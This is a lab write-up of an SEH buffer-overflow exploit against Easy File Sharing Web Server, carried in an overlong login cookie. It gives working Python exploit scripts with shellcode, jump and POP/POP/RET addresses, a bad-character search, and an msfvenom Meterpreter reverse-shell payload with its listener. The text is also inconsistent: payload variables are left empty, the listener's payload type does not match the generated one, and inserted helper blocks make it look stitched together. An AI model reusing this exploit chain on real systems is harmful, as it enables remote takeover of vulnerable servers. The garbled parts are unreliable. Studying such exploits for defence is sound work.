Notes
Follows the operations and content of Chapter 11 of "Kali Linux 2 Network Penetration Testing Practical Guide, 2nd Edition".
For study and discussion only; do not perform any illegal operations.
Leftover problems
As Windows security keeps improving (especially since the release of Windows 10 and later), the simple approach of using a JMP ESP instruction to run code placed in a data region has become very hard to pull off. A new avenue was found: the Structured Exception Handling (SEH) mechanism of Windows. Anyone with programming experience will be familiar with try/except or try/catch constructs (that is precisely what structured exception handling is):
try:
    // code to execute
except:
    // exception-handling code
This form means that in the normal case the try block runs, but if an exception occurs during execution, the except block, i.e. the exception-handling code, runs instead.
What is an SEH overflow
When an exception occurs, that is when the exception handler comes into play, as shown in the figure below:
An exception handler is a code module that catches the exceptions and error codes generated while a program runs; the SEH mechanism lets the program keep running rather than crash. Windows also has a default exception handler: when an application crashes, we usually see the system pop up a "the program has encountered an error and needs to close" window. When a program raises an exception, the address of the catch block is loaded from the stack and the catch block is called. So if we can somehow overwrite the address of the exception handler's catch block on the stack, we can take control of the application.
Because newer operating systems are more hardened, executable code and non-executable data are kept apart. Even though we can still place shellcode in the data region (the stack area that ESP points to), that shellcode cannot be executed.
This explains what the previous post observed: "No matter how many times you press, it never executes, and the ESP address keeps getting smaller, moving further and further away from our shellcode."
The address of the exception handler, however, still lies in an executable code region, so that address can be used to get the shellcode executed.
This also explains the other observation from the previous post: "EIP (the next address) stays at 0x41414141, i.e. the hex value of AAAA. That's odd, didn't we just verify that BBBB worked? Let's try again. The exception code is still 0x41414141; is there some black magic hiding in those 4071 'A's?"
The figure below shows the memory layout after we feed the program a large number of 'A's and cause the overflow:
Because there are many kinds of exceptions, the exception handler is not a single structure but a chain of handlers. When an exception is caught it is handed to the SEH chain; if the current handler cannot handle it, it is passed on to the next handler.
Each SEH record is 8 bytes: the first 4 bytes are the address of the next SEH record (the handler after this one in the chain), and the last 4 bytes are the address of the catch block. An application may have several exception handlers, which is why the first 4 bytes of an SEH record are used to store the address of the next SEH record.
Steps for exploitation based on an SEH overflow:
1) Trigger an exception in the application so that the exception handler gets invoked.
2) **Overwrite the exception handler address with the address of a POP/POP/RETN instruction sequence,** because we need to redirect execution to the address of the next SEH record (the 4 bytes just before the catch handler's address). POP/POP/RET is used because the memory address used to call the catch block is saved on the stack, and the address of the pointer to the next exception handler is at ESP+8 (ESP is the stack-top pointer). Two POPs followed by RET therefore redirect execution to the address of the next SEH record. Note: the short-jump instruction is encoded as \xeb\x06, and two \x90 bytes are appended as padding.
3) When we supplied the input in step 1, we had already replaced the next-SEH-record address with the JMP instruction that jumps to the attack payload. So when step 2 finishes, the program skips the specified number of bytes and executes the shellcode.
4) Once the jump into the shellcode succeeds, the payload runs and we obtain administrative rights on the target system.
Environment setup
See the previous post; not repeated here.
Exploiting again
Pinpointing the offset
The log window in the previous post gave us "EIP contains normal pattern : 0x46376646 (offset 4071)". At the time we took 4071 to be the most this program could take and set the offset to 4071.
With the SEH technique in mind, look again at the information in the screenshot: "ECX contains normal pattern : 0x46336646 (offset 4059)". ECX is the counter register, the built-in counter for repeat prefixes and loop instructions.
Could this value have something to do with SEH?
No need to guess: Immunity Debugger has a built-in window for viewing the SEH chain.
We trigger the program again with the 4100-character input from the previous post.
This time, watch the information in the SEH window.
Pasted out, the contents are:
SEH chain of thread 00000184
Address SE handler
46336646 *** CORRUPT ENTRY ***
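To make the chain structure and the "CORRUPT ENTRY" verdict concrete, here is an added example (not from the book or this post) that walks a constructed 32-bit stack image record by record, using the 8-byte next/handler layout described above. The stack addresses, the module ranges other than ImageLoad.dll's, and the healthy chain's handler values are made up for the demo; only the corrupt handler value 0x46336646 comes from the SEH window output pasted above.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF
STACK_BASE = 0x0019F000      # constructed: where the fake 4 KiB stack image lives
STACK_SIZE = 0x1000

# Constructed executable ranges of loaded modules. ImageLoad.dll's range is taken
# from the mona module table on this page; the other two are hypothetical.
MODULES = {
    "fsws.exe": (0x00400000, 0x00450000),
    "ImageLoad.dll": (0x10000000, 0x10050000),
    "ntdll.dll": (0x77000000, 0x77100000),
}

def make_stack(records):
    """Build a stack image from {record_address: (next_record, handler)}."""
    stack = bytearray(STACK_SIZE)
    for addr, (nxt, handler) in records.items():
        struct.pack_into("<II", stack, addr - STACK_BASE, nxt, handler)
    return bytes(stack)

# A healthy chain of three 8-byte records, each pointing at the next record higher
# up the stack; the last one carries the end-of-chain marker.
HEALTHY = make_stack({
    0x0019F100: (0x0019F800, 0x00412340),
    0x0019F800: (0x0019FF00, 0x10012345),
    0x0019FF00: (END_OF_CHAIN, 0x77012345),
})
# The same chain after an overlong "AAAA..." cookie overran the first record: its
# next field is now 0x41414141 and its handler is 0x46336646 (the value from the
# SEH window on this page), i.e. both fields hold attacker-supplied pattern bytes.
OVERFLOWED = make_stack({
    0x0019F100: (0x41414141, 0x46336646),
    0x0019F800: (0x0019FF00, 0x10012345),
    0x0019FF00: (END_OF_CHAIN, 0x77012345),
})

def in_stack(addr):
    return STACK_BASE <= addr and addr + 8 <= STACK_BASE + STACK_SIZE and addr % 4 == 0

def in_module(addr, modules):
    return any(lo <= addr < hi for lo, hi in modules.values())

def walk_seh_chain(stack, head, modules, max_records=64):
    """Walk the chain from head (the value FS:[0] holds for the thread) and classify
    each record the way a debugger's SEH view does: the handler must lie inside a
    loaded module and the next pointer must move up the stack. Stops at the first
    corrupt record, since nothing after it can be trusted."""
    entries, seen, addr = [], set(), head
    while addr != END_OF_CHAIN and len(entries) < max_records:
        if not in_stack(addr):
            entries.append({"address": addr, "status": "corrupt: record not on the stack"})
            break
        if addr in seen:
            entries.append({"address": addr, "status": "corrupt: chain loops"})
            break
        seen.add(addr)
        nxt, handler = struct.unpack_from("<II", stack, addr - STACK_BASE)
        problems = []
        if not in_module(handler, modules):
            problems.append("handler 0x%08x is not inside any loaded module" % handler)
        if nxt != END_OF_CHAIN and nxt <= addr:
            problems.append("next pointer 0x%08x does not point further up the stack" % nxt)
        status = "ok" if not problems else "corrupt: " + "; ".join(problems)
        entries.append({"address": addr, "next": nxt, "handler": handler, "status": status})
        if problems:
            break
        addr = nxt
    return entries

def report(entries):
    """Render the walk in the same two-column shape as the debugger's SEH window."""
    lines = ["Address    SE handler"]
    for e in entries:
        handler = "%08X" % e["handler"] if "handler" in e else "????????"
        lines.append("%08X   %s   %s" % (e["address"], handler, e["status"]))
    return "\n".join(lines)

if __name__ == "__main__":
    print(report(walk_seh_chain(HEALTHY, 0x0019F100, MODULES)))
    print(report(walk_seh_chain(OVERFLOWED, 0x0019F100, MODULES)))
```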
Verifying address 0x46376646 with ./pattern_offset.rb gives the same result:
┌──(kali㉿kali)-[/usr/share/metasploit-framework/tools/exploit]
└─$ ./pattern_offset.rb -q 46336646 -l 4100
[*] Exact match at offset 4059
At this point the SEH offset is confirmed to be 4059.
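As an added illustration of what pattern_offset.rb is doing (my own reimplementation, not the Metasploit tool), the cyclic pattern is generated with the same Aa0Aa1... scheme and searched for the little-endian bytes of the register values quoted from the log window; the offsets 4071 and 4059 fall out of the string itself.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits

def pattern_create(length):
    """Cyclic pattern in the Aa0Aa1...Aa9Ab0... scheme, cut to the requested length.
    One full cycle is 26*26*10 triplets = 20280 characters; longer requests repeat it."""
    cycle = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    reps = (length + len(cycle) - 1) // len(cycle)
    return (cycle * reps)[:length]

def pattern_offset(value, length):
    """Offset of a 4-byte register value (int, read little-endian as the CPU stored it)
    or of a substring inside the pattern of the given length; None if it does not occur
    (0x41414141 = "AAAA" never appears, which is why an all-'A' buffer tells us nothing)."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    pos = pattern_create(length).find(needle)
    return None if pos < 0 else pos

def locate_registers(registers, length):
    """Crash-triage helper in the spirit of mona's findmsp: for every register that holds
    4 bytes of the pattern, report the offset at which those bytes were sent."""
    hits = {}
    for name, value in registers.items():
        off = pattern_offset(value, length)
        if off is not None:
            hits[name] = off
    return hits

if __name__ == "__main__":
    # Register values copied from the debugger log quoted on this page (4100-byte pattern);
    # EAX is a constructed non-pattern value to show it is skipped.
    crash = {"EIP": 0x46376646, "ECX": 0x46336646, "EAX": 0x00000000}
    for reg, off in sorted(locate_registers(crash, 4100).items()):
        print("%s contains pattern bytes sent at offset %d" % (reg, off))
```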
Finding the address of a POP/POP/RET sequence
We now need an address from an external DLL, specifically the address of a POP/POP/RET instruction sequence in a DLL that is not protected by SafeSEH. Use Mona.py and the !mona rop command to search for POP/POP/RET. The results can be read in the Log window and are also written to C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt (the path is wherever Mona lives; I put it in the same directory as Immunity Debugger). Only modules not protected by SafeSEH are usable, i.e. the rows whose SafeSEH column is False. Then look for POP/POP/RET addresses within those modules. Pick the wrong one and the following steps will not work.
The DLLs with SafeSEH = False are listed below:
-----------------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
0x61c00000 | 0x61c99000 | 0x00099000 | False | False | False | False | False | 3.8.8.3 [sqlite3.dll] (C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll)
0x005d0000 | 0x006e7000 | 0x00117000 | True | False | False | False | False | 0.9.8k [LIBEAY32.dll] (C:\EFS Software\Easy File Sharing Web Server\LIBEAY32.dll)
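The same table can be audited mechanically. The following is an added example (not part of the post or of mona) that parses mona's module table as pasted above and lists, per module, which of the build-time mitigations SafeSEH, ASLR and NXCompat are absent; that is the list a defender would hand to the vendor. The column layout is assumed to be the nine pipe-separated fields shown in the header row.

```python
import re

# The three unprotected rows from the mona module table on this page, header included.
MONA_TABLE = r"""
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
0x61c00000 | 0x61c99000 | 0x00099000 | False | False | False | False | False | 3.8.8.3 [sqlite3.dll] (C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll)
0x005d0000 | 0x006e7000 | 0x00117000 | True | False | False | False | False | 0.9.8k [LIBEAY32.dll] (C:\EFS Software\Easy File Sharing Web Server\LIBEAY32.dll)
"""

FLAGS = ("Rebase", "SafeSEH", "ASLR", "NXCompat", "OS Dll")
# Last column: "<version> [<module name>] (<path>)"
NAME_RE = re.compile(r"^(?P<version>\S+)\s+\[(?P<name>[^\]]+)\]\s+\((?P<path>[^)]*)\)$")

def parse_mona_modules(text):
    """Parse mona's module table into a list of dicts (one per module row)."""
    modules = []
    for line in text.strip().splitlines():
        if not line.startswith("0x"):
            continue                      # header line and dashed rule
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 9:
            raise ValueError("unexpected column count in: %r" % line)
        base, top, size = (int(c, 16) for c in cells[:3])
        if top - base != size:
            raise ValueError("size does not match base/top in: %r" % line)
        flags = dict(zip(FLAGS, (c == "True" for c in cells[3:8])))
        m = NAME_RE.match(cells[8])
        if not m:
            raise ValueError("cannot parse module field: %r" % cells[8])
        modules.append({"base": base, "top": top, "size": size, **flags, **m.groupdict()})
    return modules

def audit(modules, wanted=("SafeSEH", "ASLR", "NXCompat")):
    """Return {module name: [missing mitigations]} for every non-OS module that lacks any."""
    findings = {}
    for m in modules:
        if m["OS Dll"]:
            continue                      # OS modules are the platform's responsibility
        missing = [f for f in wanted if not m[f]]
        if missing:
            findings[m["name"]] = missing
    return findings

if __name__ == "__main__":
    for name, missing in audit(parse_mona_modules(MONA_TABLE)).items():
        print("%-16s missing: %s" % (name, ", ".join(missing)))
```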
For sqlite3.dll: no POP/POP/RET sequence found.
For LIBEAY32.dll: no matching instruction found either.
Looking at ImageLoad.dll, several POP/POP/RET sequences and their addresses were found in this file (there are a great many; pick a few and try them):
#0x100202e1 : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
#0x100202ef : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
#0x1002033a : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
Based on the above analysis only the first one, ImageLoad.dll, remains usable, so 0x100202e1 was chosen first as the POP/POP/RET address.
We now have the two key components needed to write the exploit module: the offset, and the address used to load the catch block, i.e. the POP/POP/RET address.
Writing the exploit module in Python
Redefine the data sent to the target server; it consists of the following parts:
1) The characters that overflow the target service (4059 "A"s): buff = "A" * 4059
2) The instruction that performs the jump ("\xeb\x06\x90\x90"): buff += "\xeb\x06\x90\x90"
3) The POP/POP/RET instruction address: buff += "\x43\x77\x01\x10"
4) A NOP sled: it sets up a slide area between the jump address and the shellcode, filled with no-op instructions, so that the shellcode does not fail to execute. Adding 30, 40 or 50 NOPs here all slide into the shellcode (these numbers were found by testing). Too few NOPs crashes the program; too many hangs it. buff += "\x90" * 40
5) The code that performs the desired action on the target host. Such code can be found in many places, and Kali also provides tools to generate it; the code below just launches the Windows calculator.
shellcode=b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a\x1c\x39\xbd"
The complete program is as follows:
import requests
host = '192.168.229.135'
port = '80'
buff = "A"*4059
buff += "\xeb\x06\x90\x90" # jump command
buff += "\xe1\x02\x02\x10" # POP/POP/RET address: 0x100202e1(NOK), 0x100202ef(OK), 0x1002033a(OK), 0x10017743(OK)
buff += "\x90"*40
shellcode = "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a\x1c\x39\xbd"
buff += shellcode
cookies = dict(SESSIONID='25553',UserID= buff,PassWD='kali')
data = dict(frmLogin=True,frmUserName='kali',frmUserPass='kali',login='Login')
requests.post('http://'+host+':'+ port +'/forum.ghp', cookies=cookies, data=data)
After running this program, check the reaction on the target host; the result is shown in the figure below:
The book says the exploitation can be carried further but provides no corresponding content, so next we finish that work; only then is the exploitation really complete.
Identifying bad characters
- Start the Easy File Sharing Web Server program first, then attach to it from Immunity Debugger via File->Attach. Use mona to generate a byte array, excluding the null byte (\x00) by default, and note where the generated bytearray.bin file ends up. In the input box at the bottom enter:
!mona bytearray -b "\x00\x0a"
- Back on the attack machine (assumed to be Kali, likewise below), generate a string of bad characters matching the byte array. Add the bad characters to the original script and trigger it. The following Python script generates the bad-character string from \x01 to \xff:
#!/usr/bin/env python
from __future__ import print_function
# Emit "\x01\x02...\xff" as one line of Python string-literal escapes
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
- Back on the target, watch the information in the Immunity Debugger CPU window. In the input box at the bottom run
!mona bytearray -b "<bad characters identified so far>"
e.g. !mona bytearray -b "\x00\x0a"
- Run the mona compare command, referencing the byte array you generated and the address ESP points to, to confirm the bad characters:
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a <esp address>
The path is where Mona.py lives and differs per machine; mine is C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin
The <esp address> is not read straight off the screen; it is found by dumping ESP after constructing your own bad-character string. Note: exclude bad characters one at a time, because an earlier bad character can affect the one after it and make a good character look bad. Ctrl+F4 lets you review the bad characters found earlier.
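An added example (my own code, not mona's) modelling the compare step and the one-at-a-time rule from the note above. The target is a constructed stand-in whose cookie parser stops at NUL, LF, CR and ';' and rewrites \x01..\x04 to spaces, chosen only so that it reproduces the bad-character set found on this page; a one-shot diff against it shows why every byte after a truncating character looks bad.

```python
# Constructed stand-in for the target. A real target's behaviour is unknown until
# measured; this model merely reproduces the set "\x00\x0a\x01\x02\x03\x04\x0d\x3b".
TERMINATORS = {0x00, 0x0a, 0x0d, 0x3b}                     # parser stops here
REWRITTEN = {0x01: 0x20, 0x02: 0x20, 0x03: 0x20, 0x04: 0x20}  # control bytes mangled

def simulated_target(payload):
    """What lands in memory at ESP after the stand-in parser handled the payload."""
    out = bytearray()
    for b in payload:
        if b in TERMINATORS:
            break
        out.append(REWRITTEN.get(b, b))
    return bytes(out)

def bytearray_without(excluded):
    """Equivalent of '!mona bytearray -b ...': every byte value except the excluded ones."""
    excluded = set(excluded)
    return bytes(b for b in range(256) if b not in excluded)

def compare(sent, dumped):
    """'!mona compare' in miniature: a status and the first byte that did not survive."""
    for i, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return "corrupted", sent[i]
    if len(dumped) < len(sent):
        return "truncated", sent[len(dumped)]
    return "unmodified", None

def naive_diff(sent, dumped):
    """A one-shot diff flagging every position that did not match. After a truncating
    byte, every later byte is flagged too: the misjudgement the note above warns about."""
    return bytes(s for i, s in enumerate(sent) if i >= len(dumped) or dumped[i] != s)

def find_bad_chars(round_trip, known_bad=(0x00,), limit=256):
    """Exclude bad characters one at a time, re-sending after each, as recommended.
    round_trip(payload) stands for one send-and-dump cycle against the target."""
    bad = list(known_bad)
    for _ in range(limit):
        sent = bytearray_without(bad)
        status, first = compare(sent, round_trip(sent))
        if status == "unmodified":
            return bytes(bad)
        bad.append(first)
    raise RuntimeError("bad-character search did not converge")

if __name__ == "__main__":
    found = find_bad_chars(simulated_target)
    print("iterative result:", "".join("\\x%02x" % b for b in found))
    sent = bytearray_without([0x00, 0x01, 0x02, 0x03, 0x04])
    flagged = naive_diff(sent, simulated_target(sent))
    print("one-shot diff flags %d bytes starting at \\x%02x" % (len(flagged), flagged[0]))
```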
Hands-on
A note here: during bad-character confirmation the runs of A, B, C and D make it easier to find the places we need to locate. So the jump command and the POP/POP/RET address in the earlier code are both replaced, and D's are appended at the end to tell the regions apart. The NOPs are dropped as well.
buff = "A"*4059
buff += 'B'*4 #"\xeb\x06\x90\x90" # jump command
buff += 'C'*4 #"\xe1\x02\x02\x10" # POP/POP/RET address
buff += badchar
buff += 'D'*50
Full code
import requests
host = '192.168.229.135'
port = '80'
buff = "A"*4059
buff += "B"*4 #"\xeb\x06\x90\x90" # jump command
buff += "C"*4 #"\xe1\x02\x02\x10" # POP/POP/RET address
# !mona bytearray -b "\x00\x0a"
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
badchars = "\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
buff += badchars
buff += "D"*(10000-4059-4-4-len(badchars))
cookies = dict(SESSIONID='25553',UserID= buff,PassWD='kali')
data = dict(frmLogin=True,frmUserName='kali',frmUserPass='kali',login='Login')
requests.post('http://'+host+':'+ port +'/forum.ghp', cookies=cookies, data=data)
First run: exclude \x00\x0a first
!mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a 04DD72A8
Second run: after dumping the ESP register address, the badchar address is seen to be 0x04FA72A8
!mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b"
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a 04FA72A8
Appendix: the answer given in the book's slides is: "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
Generating shellcode with Metasploit
Opening the calculator earlier was only a demo; now we generate the real attack code.
Back in Kali Linux, the command is:
┌──(kali㉿kali)-[~/Learning]
└─$ msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=5001 -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" -f python
The generated content is as follows; the comment line above each variant records the bad-character set it was generated with and whether that variant worked:
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/05 --> success
buf = b""
#"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" 2022/10/05 --> success
buf = b""
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/04 --> success
buf = b""
#2022/10/05 test not badchar--> fail
buf = b""
#2022/10/05 test "\x00\x0a" --> success
buf = b""
#2022/10/05 test "\x00" --> fail
buf = b""
Put the above into the script. Note that I switched scripts here: it is no longer the earlier requests version but a socket one. The results for the different bad-character sets are also pasted in the comments. The code comes from
searchsploit easy file sharing
Not reinventing the wheel is a good thing too.
#!/usr/bin/env python
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
# Means there are two ways to exploit changeuser.ghp
# Tested on Win7 x64 and x86, it should work on win8/win10
# By Audit0r
# https://twitter.com/Audit0rSA
import sys, socket, struct
if len(sys.argv) < 3:  # both host and port are required below
print "Usage: python efsws.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
# https://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
#"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" 2022/10/05 --> success
buf = b""
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/04 --> success
buf = b""
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/05 --> success
buf = b""
#2022/10/05 test not badchar--> fail
buf = b""
#2022/10/05 test "\x00\x0a" --> success
buf = b""
#2022/10/05 test "\x00" --> fail
buf = b""
shellcode = buf  # Python 2 script (print statement below): a b"" literal is already a str here. On Python 3, str(buf) would yield the repr "b'...'" and corrupt the payload.
print "[+]Connecting to " + host
craftedreq = "A"*4059                              # junk up to the nSEH field (offset 4059 reported by mona)
craftedreq += "\xeb\x06\x90\x90"                   # nSEH: jmp short +6, padded with two NOPs; skips the 4-byte SEH address and lands in the NOP sled
craftedreq += struct.pack("<I", 0x10017743)        # SEH: address of a POP/POP/RET sequence in ImageLoad.dll, little-endian
craftedreq += "\x90"*40                            # NOP sled
craftedreq += shellcode
craftedreq += "C"*50                               # filler
# The original PoC sent GET /changeuser.ghp with the same oversized cookie; this version
# uses the forum login POST. The overlong UserID cookie value is what overwrites the SEH record.
body = "frmLogin=True&frmUserName=kali&frmUserPass=kali&login=Login"
httpreq = (
    "POST /forum.ghp HTTP/1.1\r\n"
    "Host: " + host + ":" + str(port) + "\r\n"
    "User-Agent: python-requests/2.27.1\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept: */*\r\n"
    "Connection: keep-alive\r\n"
    "Cookie: PassWD=kali; SESSIONID=25553; UserID=" + craftedreq + "\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: " + str(len(body)) + "\r\n"
    "\r\n"                                         # blank line terminates the headers
    + body
)
print "[+]Sending the payload...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
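The buffer above is assembled by hand, so it is easy to get the jump distance or the nSEH/SEH order wrong. The following is an added example, not code from the page or the book: it builds the same layout (junk, nSEH, SEH, NOP sled, shellcode, filler), encodes the short jump from its byte distance instead of a hard-coded 0x06, refuses addresses or shellcode that contain bad characters, and statically traces where the jump in nSEH lands. The bad-character set BAD_CHARS is an assumption for the example (the page does not list this server's bad characters); the offset 4059 and the address 0x10017743 are the values used above.

```python
import struct

# Assumed bad characters for this example (the page does not list the web
# server's bad characters; NUL and CR/LF cannot survive inside a cookie header).
BAD_CHARS = b"\x00\x0a\x0d"


def short_jmp(skip):
    """Encode `jmp short` (EB rel8). rel8 is relative to the end of the
    2-byte instruction, so `skip` is the number of bytes jumped over."""
    if not -128 <= skip <= 127:
        raise ValueError("jmp short can only reach -128..+127 bytes")
    return b"\xeb" + struct.pack("<b", skip)


def check_bad_chars(name, data, bad=BAD_CHARS):
    """Raise if any byte of `data` is in the bad-character set."""
    hits = sorted({b for b in data if b in bad})
    if hits:
        raise ValueError("%s contains bad chars: %s" % (name, [hex(h) for h in hits]))


def build_seh_payload(nseh_offset, ppr_addr, shellcode, nop_sled=40,
                      filler=b"C" * 50, bad=BAD_CHARS):
    """Build the SEH-overwrite buffer used by the exploit above:

        [junk * nseh_offset][nSEH][SEH][NOP sled][shellcode][filler]

    nSEH = jmp short +6 padded with two NOPs to 4 bytes. When POP/POP/RET
    returns into nSEH, the 2-byte jump skips its own two NOPs plus the
    4-byte SEH address (6 bytes) and lands on the first byte of the sled.
    """
    nseh = short_jmp(6) + b"\x90\x90"
    seh = struct.pack("<I", ppr_addr)          # little-endian handler address
    check_bad_chars("POP/POP/RET address", seh, bad)
    check_bad_chars("shellcode", shellcode, bad)
    return (b"A" * nseh_offset + nseh + seh + b"\x90" * nop_sled
            + shellcode + filler)


def trace_landing(payload, nseh_offset):
    """Follow the control flow statically: decode the jmp short stored in the
    nSEH field and return where it lands, plus the overwritten handler address."""
    opcode = payload[nseh_offset]
    rel8 = struct.unpack("<b", payload[nseh_offset + 1:nseh_offset + 2])[0]
    if opcode != 0xEB:
        raise ValueError("nSEH does not start with jmp short")
    seh_addr = struct.unpack("<I", payload[nseh_offset + 4:nseh_offset + 8])[0]
    landing = nseh_offset + 2 + rel8           # target = next instruction + rel8
    return {"seh": seh_addr, "landing": landing, "sled": nseh_offset + 8}


if __name__ == "__main__":
    p = build_seh_payload(4059, 0x10017743, b"\xcc" * 4)
    print(trace_landing(p, 4059))
```

trace_landing is the check worth running before every send: the landing offset must equal the sled offset, and the decoded SEH value must be the POP/POP/RET address, otherwise the bytes were packed in the wrong order or with the wrong endianness.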
Open Metasploit and start a handler (the listener side). LHOST and LPORT here must match the values that were baked into the shellcode when it was generated:
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
